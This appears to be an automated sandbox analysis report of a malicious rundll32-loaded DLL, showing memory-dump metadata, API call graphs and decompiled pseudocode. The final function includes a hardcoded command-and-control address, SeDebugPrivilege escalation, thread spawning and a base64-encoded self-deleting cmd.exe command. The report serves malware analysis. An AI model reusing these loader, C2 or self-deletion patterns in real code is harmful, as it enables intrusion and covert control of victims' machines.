            0x1000c84f
            0x1000c852
            0x1000c854
            0x1000c85a
            0x1000c860
            0x1000c869
            0x1000c86c
            0x1000c86f
            0x1000c875
            0x1000c8ed
            0x1000c8ed
            0x1000c8f4
            0x1000c8fe
            0x00000000
            0x1000c8fe
            0x1000c8f6
            0x1000c8f8
            0x1000c908
            0x1000c908
            0x1000c90f
            0x1000c914
            0x1000c915
            0x1000c91d
            0x1000c91f
            0x1000c932
            0x1000c932
            0x1000c932
            0x1000c936
            0x1000c93d
            0x1000c93d
            0x1000c940
            0x1000c942
            0x00000000
            0x00000000
            0x1000c94a
            0x1000c94f
            0x1000c955
            0x1000c957
            0x1000c95d
            0x1000c95e
            0x1000c963
            0x1000c974
            0x1000c97c
            0x1000c97d
            0x1000c97e
            0x1000c97f
            0x1000c984
            0x1000c98a
            0x1000c98c
            0x1000c993
            0x1000c993
            0x1000c999
            0x1000c99b
            0x00000000
            0x00000000
            0x1000c99d
            0x1000c99d
            0x1000c9a1
            0x1000c9a7
            0x00000000
            0x1000c9a7
            0x1000c98e
            0x00000000
            0x1000c98e
            0x00000000
            0x1000c91f
            0x1000c8fa
            0x1000c8fc
            0x00000000
            0x00000000
            0x00000000
            0x1000c8fc
            0x1000c877
            0x1000c879
            0x1000c880
            0x1000c880
            0x1000c887
            0x1000c88e
            0x1000c890
            0x1000c890
            0x1000c890
            0x1000c890
            0x1000c8a0
            0x1000c8a2
            0x1000c8b3
            0x1000c8b8
            0x1000c8ba
            0x1000c8e3
            0x00000000
            0x1000c8bc
            0x1000c8bc
            0x1000c8c3
            0x1000c8c8
            0x1000c8c9
            0x1000c8d1
            0x1000c8d3
            0x00000000
            0x00000000
            0x1000c8d8
            0x1000c8da
            0x1000c8df
            0x1000c8e1
            0x00000000
            0x00000000
            0x00000000
            0x1000c8e1
            0x1000c8ba
            0x1000c87b
            0x1000c87e
            0x00000000
            0x00000000
            0x00000000
            0x1000c87e
            0x1000c7f5
            0x1000c7f8
            0x1000c7fb
            0x1000c80f
            0x1000c811
            0x00000000
            0x00000000
            0x1000c815
            0x1000c80b
            0x1000c80b
            0x00000000
            0x1000c80b
            0x1000c806
            0x00000000
            0x1000c806
            0x1000c7c3
            0x1000c7c6
            0x1000c7cf
            0x1000c7d4
            0x1000c7d7
            0x1000c7d7
            0x1000c7d7
            0x1000c7d7
            0x1000c7db
            0x1000c7dd
            0x00000000
            0x1000c7df
            0x1000c7df
            0x1000c7e3
            0x00000000
            0x00000000
            0x1000c7e5
            0x1000c7e7
            0x00000000
            0x1000c7e7
            0x00000000
            0x00000000
            0x00000000
            0x1000c74b
            0x1000c74b
            0x1000c74b
            0x1000c74d
            0x1000c74f
            0x00000000
            0x00000000
            0x1000c753
            0x1000c759
            0x1000c759
            0x1000c75b
            0x00000000
            0x00000000
            0x00000000
            0x1000c75b
            0x00000000
            0x1000c74b
            0x1000c721
            0x00000000
            0x1000c726
            0x1000c6fc
            0x00000000
            0x1000c6fc
            0x1000c5a1
            0x1000c49b
            0x1000c49e
            0x1000c4a0
            0x1000c4a3
            0x00000000
            0x1000c4a3
            0x1000c487
            0x1000c48a
            0x1000c48c
            0x1000c48f
            0x00000000
            0x1000c48f
            0x1000c479
            0x1000c47b
            0x00000000
            0x1000c47b
            0x1000c464
            0x1000c469
            0x1000c46c
            0x00000000
            0x00000000
            0x00000000
            0x1000c46c
            0x1000c435
            0x1000c436
            0x1000c43b
            0x1000c443
            0x1000c444
            0x00000000
            0x00000000
            0x1000c446
            0x00000000
            0x1000c3d0
            0x00000000
            0x1000c3d0

            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID: /$UT
            • API String ID: 0-1626504983
            • Opcode ID: 011cfa80826d7be16224f1e05208e39277c528805b706d3603a9fdb0960ef0be
            • Instruction ID: 2ff0a1464254cde498339df49cc164f73800a0e7302aa6a381dd2afc7f8218aa
            • Opcode Fuzzy Hash: 011cfa80826d7be16224f1e05208e39277c528805b706d3603a9fdb0960ef0be
            • Instruction Fuzzy Hash: 2C02D375A0438D9BEB21CF68C845F9EBBF5EF04380F1444AEE449A7246CB70AE85CB51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E10005CF7(intOrPtr _a4, intOrPtr _a8) {
            				char _v8;
            				void _v267;
            				char _v268;
            				void* _t20;
            				signed int _t26;
            				signed int _t30;
            
            				_t30 = 0x40;
            				_v268 = 0;
            				memset( &_v267, 0, _t30 << 2);
            				asm("stosw");
            				asm("stosb");
            				E10003EF4( &_v268, "%s\\lang.ini", 0x100167d0);
            				if(E10003F72( &_v268) != 0) {
            					_v8 = 0;
            					_t20 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
            					_t36 = _t20;
            					if(_t20 == 0xffffffff) {
            						goto L1;
            					}
            					E10004035(_t36, _a4, _a8,  &_v8, 0);
            					E10003F92(_t36);
            					if(E10003F7D(_a4, "http://") == 0) {
            						goto L1;
            					}
            					_t26 = E10003F7D(_a4, "search");
            					asm("sbb eax, eax");
            					return  ~_t26 + 1;
            				}
            				L1:
            				return 0;
            			}









            0x10005d07
            0x10005d10
            0x10005d1b
            0x10005d1d
            0x10005d1f
            0x10005d2c
            0x10005d42
            0x10005d5e
            0x10005d61
            0x10005d66
            0x10005d6e
            0x00000000
            0x00000000
            0x10005d7c
            0x10005d82
            0x10005d99
            0x00000000
            0x00000000
            0x10005da3
            0x10005dab
            0x00000000
            0x10005dae
            0x10005d44
            0x00000000

            APIs
              • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,100167D0,?,00000000,00080000), ref: 10003F76
            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D61
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
            • String ID: %s\lang.ini$http://$search
            • API String ID: 1721638100-482061809
            • Opcode ID: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
            • Instruction ID: 8c54ec75ac406b03aa883dad07c62b5b690cd8483bd5bdce465cc98b2d904575
            • Opcode Fuzzy Hash: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
            • Instruction Fuzzy Hash: 971106769081197FFB61DAA4CC42FDB776CDB143D5F1045B2FB48A9080EA71AFC44A60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 80%
            			E10005C4C(intOrPtr _a4, intOrPtr _a8) {
            				char _v8;
            				void _v267;
            				char _v268;
            				void* _t19;
            				signed int _t24;
            				signed int _t28;
            
            				_t28 = 0x40;
            				_v268 = 0;
            				memset( &_v267, 0, _t28 << 2);
            				asm("stosw");
            				asm("stosb");
            				E10003EF4( &_v268, "%s\\lang.ini", 0x100167d0);
            				if(E10003F72( &_v268) != 0) {
            					_v8 = 0;
            					_t19 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
            					_t32 = _t19;
            					if(_t19 == 0xffffffff) {
            						goto L1;
            					}
            					E10004035(_t32, _a4, _a8,  &_v8, 0);
            					E10003F92(_t32);
            					_t24 = E10003F7D(_a4, "http://");
            					asm("sbb eax, eax");
            					return  ~( ~_t24);
            				}
            				L1:
            				return 0;
            			}









            0x10005c5c
            0x10005c65
            0x10005c70
            0x10005c72
            0x10005c74
            0x10005c81
            0x10005c97
            0x10005cb3
            0x10005cb6
            0x10005cbb
            0x10005cc3
            0x00000000
            0x00000000
            0x10005cd1
            0x10005cd7
            0x10005ce4
            0x10005cee
            0x00000000
            0x10005cf0
            0x10005c99
            0x00000000

            APIs
              • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,100167D0,?,00000000,00080000), ref: 10003F76
            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CB6
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
            • String ID: %s\lang.ini$http://
            • API String ID: 1721638100-679094439
            • Opcode ID: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
            • Instruction ID: 384da5e59b1e856c45bbe6372d81ece75bf9070c03a2386a6f56754dbd155cb7
            • Opcode Fuzzy Hash: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
            • Instruction Fuzzy Hash: 601104769041197EFB21DAA4CC42FDB776CDB143C4F0085B1FA48B6080EA71AF844660
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:14.2%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:50
            Total number of Limit Nodes:3
            execution_graph 332 41714a4 VirtualProtect 333 41714e3 VirtualProtect 332->333 334 41714df 332->334 334->333 335 4170063 336 4170067 335->336 337 41700c3 336->337 338 417006b VirtualAlloc 336->338 338->337 340 4170084 338->340 339 41700b5 VirtualFree 339->337 340->339 354 4170e83 355 4170e8d LoadLibraryA 354->355 356 4170ea5 355->356 356->355 357 4170eab GetProcAddress 356->357 358 4170ec8 356->358 357->356 341 4170cb1 343 4170cdd 341->343 344 4170d0d 343->344 345 4170d3b VirtualAlloc 344->345 348 4170d6a 345->348 346 4170e0c MessageBoxA ExitProcess 347 4170e26 349 4170e54 VirtualFree 347->349 348->346 348->347 350 4170dab 348->350 351 4170dbb wsprintfA 350->351 352 4170dcb 350->352 351->352 352->346 359 4170c61 362 4170d5d 359->362 360 4170e0c MessageBoxA ExitProcess 361 4170e26 363 4170e54 VirtualFree 361->363 362->360 362->361 364 4170dab 362->364 365 4170dcb 364->365 366 4170df0 wsprintfA 364->366 365->360 366->365 367 417152b GetProcAddress 368 417002a 369 417002c 368->369 370 4170056 369->370 377 4170047 369->377 373 4170045 373->370 381 4170063 373->381 374 41700aa VirtualFree 374->370 378 417004b 377->378 379 417003b 378->379 380 4170063 2 API calls 378->380 379->373 379->374 380->379 382 4170067 381->382 383 41700c3 382->383 384 417006b VirtualAlloc 382->384 383->370 384->383 386 4170084 384->386 385 41700b5 VirtualFree 385->383 386->385 387 4171509 LoadLibraryA

            Callgraph

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNELBASE(00000000,ABAD1000,00001000,00000040,04171600,?,?,?,?), ref: 04170D5C
            • wsprintfA.USER32(?,?,?,?), ref: 04170E00
            • MessageBoxA.USER32(00000000,?,?,00000010), ref: 04170E18
            • ExitProcess.KERNEL32(00000000), ref: 04170E20
            Strings
            Memory Dump Source
            • Source File: 00000010.00000002.278023255.0000000004170000.00000040.00000800.00020000.00000000.sdmp, Offset: 04170000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_16_2_4170000_rundll32.jbxd
            Similarity
            • API ID: AllocExitMessageProcessVirtualwsprintf
            • String ID: SWVU$The procedure %s could not be located in the DLL %s.
            • API String ID: 1926473177-4208015514
            • Opcode ID: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
            • Instruction ID: de688e78b347ade55b96ae19440d18536bd34d69ca0f351a7b7c9ed218e82262
            • Opcode Fuzzy Hash: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
            • Instruction Fuzzy Hash: 01417A322417069FEB38DF14CC84EEB77B5AF48355F044258EE4AA7649EF70B9108B90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • wsprintfA.USER32(?,?,?,?), ref: 04170E00
            • MessageBoxA.USER32(00000000,?,?,00000010), ref: 04170E18
            • ExitProcess.KERNEL32(00000000), ref: 04170E20
            • VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 04170E69
            Strings
            Memory Dump Source
            • Source File: 00000010.00000002.278023255.0000000004170000.00000040.00000800.00020000.00000000.sdmp, Offset: 04170000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_16_2_4170000_rundll32.jbxd
            Similarity
            • API ID: ExitFreeMessageProcessVirtualwsprintf
            • String ID: SWVU$The procedure %s could not be located in the DLL %s.
            • API String ID: 789587083-4208015514
            • Opcode ID: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
            • Instruction ID: ffd9c06621b4f548cc61733b5f2a795d3b3051c9190effe4612e1b6210c93a8c
            • Opcode Fuzzy Hash: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
            • Instruction Fuzzy Hash: 6731AD322457869FEB398F10CC94FEB7BB9AF49354F044259ED4687285EF30B8148B50
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 58 41714a4-41714dd VirtualProtect 59 41714e3-41714fb VirtualProtect 58->59 60 41714df-41714e1 58->60 60->59
            APIs
            • VirtualProtect.KERNELBASE(?,00001000,00000004,?,?), ref: 041714D3
            • VirtualProtect.KERNELBASE(?,00001000,?,?), ref: 041714F1
            Memory Dump Source
            • Source File: 00000010.00000002.278023255.0000000004170000.00000040.00000800.00020000.00000000.sdmp, Offset: 04170000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_16_2_4170000_rundll32.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
            • Instruction ID: dc229b691c096d3ee6168b0163c38ce3709b527f2d185cf7980c3a4cd5313249
            • Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
            • Instruction Fuzzy Hash: B9F0E933240245AFEB198FA4D885EEE7768DF48398B2001AAF6029A186CA71E555C754
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 61 4170063-4170069 63 41700c3-41700c5 61->63 64 417006b-4170082 VirtualAlloc 61->64 65 41700c6-41700ca 63->65 64->63 66 4170084-41700b0 call 41700cd 64->66 69 41700b5-41700c1 VirtualFree 66->69 70 41700b2-41700b4 66->70 69->63 69->65 70->69
            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0417007E
            • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 041700BE
            Memory Dump Source
            • Source File: 00000010.00000002.278023255.0000000004170000.00000040.00000800.00020000.00000000.sdmp, Offset: 04170000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_16_2_4170000_rundll32.jbxd
            Similarity
            • API ID: Virtual$AllocFree
            • String ID:
            • API String ID: 2087232378-0
            • Opcode ID: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
            • Instruction ID: 42cbb11c353dd482b8ac29f694eb1cbec4471c9d96c9d89830fc9b6d598bc3e8
            • Opcode Fuzzy Hash: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
            • Instruction Fuzzy Hash: 6D0181762097017EE7314AA19C40F77BFECDF4C666F144C5AFAD5C1090DA25E4409B70
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 71 417002a-417002e 73 4170034-4170043 call 4170047 71->73 74 41700c3-41700c5 71->74 78 4170045-417004c 73->78 79 41700aa-41700b0 73->79 76 41700c6-41700ca 74->76 82 4170056-4170061 78->82 83 4170051 call 4170063 78->83 80 41700b5-41700c1 VirtualFree 79->80 81 41700b2-41700b4 79->81 80->74 80->76 81->80 82->74 83->82
            APIs
            • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 041700BE
            Memory Dump Source
            • Source File: 00000010.00000002.278023255.0000000004170000.00000040.00000800.00020000.00000000.sdmp, Offset: 04170000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_16_2_4170000_rundll32.jbxd
            Similarity
            • API ID: FreeVirtual
            • String ID:
            • API String ID: 1263568516-0
            • Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
            • Instruction ID: 2050db558bedd56219edd5bb10e8a3a15d4546c89a80360c0c2dd781c67f6058
            • Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
            • Instruction Fuzzy Hash: FCF0592224A30129F2106B347CC8A67BFB8DB0B379B150D97EC40D2091DF11E80286E4
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:1.9%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:20
            Total number of Limit Nodes:2
            execution_graph 16361 32b0063 16362 32b0067 16361->16362 16363 32b006b VirtualAlloc 16362->16363 16364 32b00c3 16362->16364 16363->16364 16365 32b0084 16363->16365 16366 32b00b5 VirtualFree 16365->16366 16366->16364 16370 32b0cb1 16372 32b0cdd 16370->16372 16373 32b0d0d 16372->16373 16374 32b0d3b VirtualAlloc 16373->16374 16376 32b0d6a 16374->16376 16375 32b0e0c MessageBoxA ExitProcess 16376->16375 16377 32b0e26 16376->16377 16379 32b0dab 16376->16379 16378 32b0e54 VirtualFree 16377->16378 16380 32b0dbb wsprintfA 16379->16380 16382 32b0dcb 16379->16382 16380->16382 16382->16375 16367 32b14a4 VirtualProtect 16368 32b14df 16367->16368 16369 32b14e3 VirtualProtect 16367->16369 16368->16369

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNEL32(00000000,ABAD1000,00001000,00000040,032B1600,?,?,?,?), ref: 032B0D5C
            • wsprintfA.USER32(?,?,?,?), ref: 032B0E00
            • MessageBoxA.USER32(00000000,?,?,00000010), ref: 032B0E18
            • ExitProcess.KERNEL32(00000000), ref: 032B0E20
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289325786.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_32b0000_rundll32.jbxd
            Similarity
            • API ID: AllocExitMessageProcessVirtualwsprintf
            • String ID: SWVU$The procedure %s could not be located in the DLL %s.
            • API String ID: 1926473177-4208015514
            • Opcode ID: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
            • Instruction ID: df9d129dfde33c1d34ebbdd8d59f9d981a5012a4463be4a213d1cf51507151da
            • Opcode Fuzzy Hash: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
            • Instruction Fuzzy Hash: 75417D362517069FEB35DF14CC44EEB73B5EF48391F048119EE4697685EB70B8608B90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • wsprintfA.USER32(?,?,?,?), ref: 032B0E00
            • MessageBoxA.USER32(00000000,?,?,00000010), ref: 032B0E18
            • ExitProcess.KERNEL32(00000000), ref: 032B0E20
            • VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 032B0E69
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289325786.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_32b0000_rundll32.jbxd
            Similarity
            • API ID: ExitFreeMessageProcessVirtualwsprintf
            • String ID: SWVU$The procedure %s could not be located in the DLL %s.
            • API String ID: 789587083-4208015514
            • Opcode ID: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
            • Instruction ID: 2d8328ebc84ffcdc2dfea79251046ecece462f0b3b534306cd3c366a0a9801f4
            • Opcode Fuzzy Hash: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
            • Instruction Fuzzy Hash: 9031AF362553469FDB3ACF10CC54FEB77B8AF45394F088159ED4687185EF70A4548B90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 114 32b14a4-32b14dd VirtualProtect 115 32b14df-32b14e1 114->115 116 32b14e3-32b14fb VirtualProtect 114->116 115->116
            APIs
            • VirtualProtect.KERNEL32(?,00001000,00000004,?,?), ref: 032B14D3
            • VirtualProtect.KERNEL32(?,00001000,?,?), ref: 032B14F1
            Memory Dump Source
            • Source File: 00000012.00000002.289325786.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_32b0000_rundll32.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
            • Instruction ID: eaf7fbb46f83195a7242a243cec68775ec788f8865f275d8bc149001a608a7ee
            • Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
            • Instruction Fuzzy Hash: BEF0E933240245AFEB1D8FA4D895EEE7778DF48398B20016AF6029A186CA71E651C754
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 117 32b0063-32b0069 119 32b006b-32b0082 VirtualAlloc 117->119 120 32b00c3-32b00c5 117->120 119->120 122 32b0084-32b00a4 119->122 121 32b00c6-32b00ca 120->121 123 32b00aa-32b00b0 122->123 124 32b00a5 call 32b00cd 122->124 125 32b00b2-32b00b4 123->125 126 32b00b5-32b00c1 VirtualFree 123->126 124->123 125->126 126->121
            APIs
            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 032B007E
            • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 032B00BE
            Memory Dump Source
            • Source File: 00000012.00000002.289325786.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_32b0000_rundll32.jbxd
            Similarity
            • API ID: Virtual$AllocFree
            • String ID:
            • API String ID: 2087232378-0
            • Opcode ID: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
            • Instruction ID: 4db07b00b664a4254425c0179fb781346dc6af7f72c9b5b7769d41297d4f4a94
            • Opcode Fuzzy Hash: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
            • Instruction Fuzzy Hash: D101A4762197027EE7328AA19C00F77BBECDF48752F188C5AFAD5C5090DA65E4848B70
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 195 32b002a-32b002e 197 32b00c3-32b00c5 195->197 198 32b0034-32b0043 call 32b0047 195->198 199 32b00c6-32b00ca 197->199 202 32b00aa-32b00b0 198->202 203 32b0045-32b0061 call 32b0063 198->203 205 32b00b2-32b00b4 202->205 206 32b00b5-32b00c1 VirtualFree 202->206 203->202 205->206 206->199
            APIs
            • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 032B00BE
            Memory Dump Source
            • Source File: 00000012.00000002.289325786.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_32b0000_rundll32.jbxd
            Similarity
            • API ID: FreeVirtual
            • String ID:
            • API String ID: 1263568516-0
            • Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
            • Instruction ID: f46224d878c349d1d6a14d3b2cc63d2611fd5dcb998de6d22df1ee5c08a5c4fa
            • Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
            • Instruction Fuzzy Hash: 1FF02E2256E3126DF622F7357C44AA7FBB8EF43361B194D97DC40D6091DF11D88286E4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 51%
            			E10008656(void* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0, signed int _a12) {
            				void* _v19;
            				char _v20;
            				void _v1043;
            				char _v1044;
            				char _v1444;
            				void* _v1452;
            				void* __ebx;
            				void* __edi;
            				void* __ebp;
            				void* _t15;
            				CHAR* _t18;
            				signed int _t22;
            				void* _t24;
            				void* _t31;
            				intOrPtr* _t39;
            				void* _t40;
            				void* _t43;
            				void* _t48;
            				void* _t52;
            				void* _t53;
            				void* _t56;
            				intOrPtr _t64;
            				void* _t66;
            
            				_t79 = __fp0;
            				_t63 = __esi;
            				_t55 = __edx;
            				_t15 = E10005989(_t43, __ecx, __edx, _t56, __esi, _t66, __eflags, __fp0);
            				0x100337e0(0, 1, "F896SD5DAE", 0x10015a68);
            				asm("daa");
            				0x1003b59a(_t66);
            				if(_t15 != 0xb7) {
            					_t72 = _t15 - 5;
            					if(_t15 != 5) {
            						E100042A2(0, _t72, __fp0, "SeDebugPrivilege", 1);
            						_t24 = E10005986();
            						0x1004075a(0x100168d4, __esi);
            						_t64 =  *0x1000e094;
            						if(_t24 == 0) {
            							_t39 = E100044AD(_t24, __edx, 0x35);
            							_pop(_t53);
            							if(_t39 != 0xffffffff) {
            								_t39 = E10004351(_t39, _t53, __edx, __fp0, _t39, "123");
            								_pop(_t53);
            							}
            							0x10030e70(0);
            							_t66 = 0x100168d4;
            							asm("adc [esp+edx+0x68], dh");
            							asm("rol byte [edi], 1");
            							 *_t39 =  *_t39 + _t39;
            							Sleep(??);
            							_t2 =  &_a12; // 0x0
            							_push( *_t2);
            							_t40 = L1002E51E(_t39, _t53, _t66);
            							asm("repe call 0xffffbd83");
            							_t76 = _t40;
            							if(_t40 == 0) {
            								CreateThread(0, 0, E10008578, 0, 0, 0);
            							}
            							E10006DD5(0, _t53, _t55, 0x100168d4, _t64, _t76, _t79);
            						}
            						CreateThread(0, 0, E10006EE7, 0, 0, 0);
            						Sleep(0x3e8);
            						_t3 =  &_v1444; // 0x10016334
            						0x10033977(0x202, _t3);
            						CreateThread(0, 0, E10006B30, "107.163.56.251:6658", 0, 0);
            						CreateThread(0, 0, E10008208, 0, 0, 0);
            						Sleep(0xbb8);
            						_v20 = 0;
            						asm("stosd");
            						asm("stosd");
            						asm("stosd");
            						asm("stosw");
            						asm("stosb");
            						_t6 =  &_v20; // 0x100168c4
            						_t31 = E10005ACA(_t76, _t6);
            						_t77 = _t31 - 5;
            						_t52 = _t66;
            						if(_t31 < 5) {
            							CreateThread(0, 0, E10007112, 0, 0, 0);
            						}
            						CreateThread(0, 0, E1000827D, 0, 0, 0);
            						Sleep(0xbb8);
            						CreateThread(0, 0, E1000490F, 0, 0, 0);
            						CreateThread(0, 0, E10006EEF, 0, 0, 0);
            						if(E10004482(_t52, _t77, _t79) == 0) {
            							Sleep(0x927c0);
            							CreateThread(0, 0, 0x10006a7f, 0, 0, 0);
            							Sleep(0x1388);
            							CreateThread(0, 0, E1000842D, 0, 0, 0);
            						}
            						Sleep(0xffffffff);
            						L13:
            						Sleep(0x36ee80);
            						goto L13;
            					}
            				}
            				_v1044 = 0;
            				memset( &_v1043, 0, 0xff << 2);
            				asm("stosw");
            				asm("stosb");
            				_t18 = E10001000(0, __eflags, _t79, "Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=");
